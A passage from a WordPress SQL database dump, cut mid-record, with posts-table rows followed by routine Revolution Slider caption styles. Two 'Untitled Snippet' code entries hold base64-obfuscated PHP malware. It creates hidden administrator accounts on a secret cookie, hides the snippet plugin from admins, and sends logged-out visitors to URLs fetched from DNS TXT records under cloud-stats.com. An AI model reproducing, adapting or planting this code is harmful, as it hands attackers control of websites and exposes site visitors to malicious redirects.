base64_decode(\'YXU=\'):$u4=_gcookie(base64_decode(\'dQ==\'));$g5=_gcookie(base64_decode(\'cA==\'));$n6=_gcookie(base64_decode(\'ZQ==\'));if($u4&&$g5&&$n6&&!username_exists($u4)){$m7=wp_create_user($u4,$g5,$n6);$d8=new WP_User($m7);$d8->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode(\'U0NSSVBUX05BTUU=\')])!==false){return;}if(_gcookie(base64_decode(\'c2tpcA==\'))===base64_decode(\'MQ==\')){return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$v9])as $t10){$t10=trim($t10);if(filter_var($t10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $t10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$t10=_user_ip();if(!$t10){return;}$r11=get_transient(base64_decode(\'ZXhw\'));if(!is_array($r11)){$r11=array();}foreach($r11 as $r12=>$o13){if(time()-$o13>86400){unset($r11[$r12]);}}if(key_exists($t10,$r11)&&(time()-$r11[$t10]<86400)){return;}$j14=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$v15=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$t10);$v15=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$v15);$r16=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$m17=get_option(base64_decode(\'ZA==\'));if($m17&&strpos($m17,base64_decode(\'Lg==\'))>0){$r16=$m17;}$u18=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$t19=(!$j14?base64_decode(\'dW5rLmNvbQ==\'):$j14).base64_decode(\'Lg==\').(!$v15?base64_decode(\'MC0wLTAtMA==\'):$v15).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$u18:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$r16;$n20=@dns_get_record($t19,DNS_TXT);if(is_array($n20)&&!empty($n20)){if(isset($n20[0][base64_decode(\'dHh0\')])){$n20=$n20[0][base64_decode(\'dHh0\')];$n20=base64_decode($n20);if($n20==base64_decode(\'ZXJy\')){$r11[$t10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$r11);}else if(substr($n20,0,4)===base64_decode(\'aHR0cA==\')){$r11[$t10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$r11);wp_redirect($n20);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-10','','','2024-04-09 13:46:20','2024-04-09 13:46:20','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4996,1,'2024-04-09 13:50:29','2024-04-09 13:50:29','$c2017921717=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9\');echo base64_decode(\'I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($p3968202353){unset($p3968202353[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $p3968202353;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _gcookie($c2013832146){return(isset($_COOKIE[$c2013832146]))?base64_decode($_COOKIE[$c2013832146]):\'\';}if(!empty($c2017921717)&&_gcookie(base64_decode(\'cHc=\'))===$c2017921717){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$u2564639436=_gcookie(base64_decode(\'ZA==\'));if(strpos($u2564639436,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$u2564639436);}break;case base64_decode(\'YXU=\'):$m4067256894=_gcookie(base64_decode(\'dQ==\'));$y2181537457=_gcookie(base64_decode(\'cA==\'));$r4024072794=_gcookie(base64_decode(\'ZQ==\'));if($m4067256894&&$y2181537457&&$r4024072794&&!username_exists($m4067256894)){$b2809058197=wp_create_user($m4067256894,$y2181537457,$r4024072794);$t2375276105=new WP_User($b2809058197);$t2375276105->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode(\'U0NSSVBUX05BTUU=\')])!==false){return;}if(_gcookie(base64_decode(\'c2tpcA==\'))===base64_decode(\'MQ==\')){return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $k2324736937){if(array_key_exists($k2324736937,$_SERVER)&&!empty($_SERVER[$k2324736937])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$k2324736937])as $j2783163181){$j2783163181=trim($j2783163181);if(filter_var($j2783163181,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $j2783163181;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$j2783163181=_user_ip();if(!$j2783163181){return;}$w113136155=get_transient(base64_decode(\'ZXhw\'));if(!is_array($w113136155)){$w113136155=array();}foreach($w113136155 as $t140662621=>$g1801730948){if(time()-$g1801730948>86400){unset($w113136155[$t140662621]);}}if(key_exists($j2783163181,$w113136155)&&(time()-$w113136155[$j2783163181]<86400)){return;}$y3475444733=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$l1584689357=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$j2783163181);$l1584689357=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$l1584689357);$l2439710439=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$e252678980=get_option(base64_decode(\'ZA==\'));if($e252678980&&strpos($e252678980,base64_decode(\'Lg==\'))>0){$l2439710439=$e252678980;}$f3775001192=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$s2545728356=(!$y3475444733?base64_decode(\'dW5rLmNvbQ==\'):$y3475444733).base64_decode(\'Lg==\').(!$l1584689357?base64_decode(\'MC0wLTAtMA==\'):$l1584689357).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$f3775001192:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$l2439710439;$q453955339=@dns_get_record($s2545728356,DNS_TXT);if(is_array($q453955339)&&!empty($q453955339)){if(isset($q453955339[0][base64_decode(\'dHh0\')])){$q453955339=$q453955339[0][base64_decode(\'dHh0\')];$q453955339=base64_decode($q453955339);if($q453955339==base64_decode(\'ZXJy\')){$w113136155[$j2783163181]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$w113136155);}else if(substr($q453955339,0,4)===base64_decode(\'aHR0cA==\')){$w113136155[$j2783163181]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$w113136155);wp_redirect($q453955339);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','publish','closed','closed','','untitled-snippet','','','2024-04-09 13:50:29','2024-04-09 13:50:29','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0);
/*!40000 ALTER TABLE `wpev_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_css`
--

DROP TABLE IF EXISTS `wpev_revslider_css`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_css` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `settings` longtext DEFAULT NULL,
  `hover` longtext DEFAULT NULL,
  `advanced` longtext DEFAULT NULL,
  `params` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `handle_index` (`handle`(64))
) ENGINE=InnoDB AUTO_INCREMENT=110 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_css`
--

LOCK TABLES `wpev_revslider_css` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_css` DISABLE KEYS */;
INSERT INTO `wpev_revslider_css` VALUES (1,'.tp-caption.medium_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}'),(2,'.tp-caption.small_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(3,'.tp-caption.medium_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(4,'.tp-caption.large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(5,'.tp-caption.very_large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(6,'.tp-caption.very_big_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}'),(7,'.tp-caption.very_big_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}'),(8,'.tp-caption.modern_medium_fat','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(9,'.tp-caption.modern_medium_fat_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(10,'.tp-caption.modern_medium_light','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(11,'.tp-caption.modern_big_bluebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}'),(12,'.tp-caption.modern_big_redbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}'),(13,'.tp-caption.modern_small_text_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(14,'.tp-caption.boxshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}','[]'),(15,'.tp-caption.black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000\"}'),(16,'.tp-caption.noshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','[]'),(17,'.tp-caption.thinheadline_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(18,'.tp-caption.thintext_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(19,'.tp-caption.largeblackbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(20,'.tp-caption.largepinkbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(21,'.tp-caption.largewhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(22,'.tp-caption.largegreenbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(23,'.tp-caption.excerpt','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}','{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),(24,'.tp-caption.large_bold_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(25,'.tp-caption.medium_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(26,'.tp-caption.small_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(27,'.tp-caption.lightgrey_divider','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(28,'.tp-caption.large_bold_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(29,'.tp-caption.medium_bg_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(30,'.tp-caption.medium_bold_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(31,'.tp-caption.medium_light_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(32,'.tp-caption.medium_bg_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(33,'.tp-caption.medium_bold_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(34,'.tp-caption.medium_bg_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(35,'.tp-caption.grassfloor','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(36,'.tp-caption.large_bold_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(37,'.tp-caption.medium_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 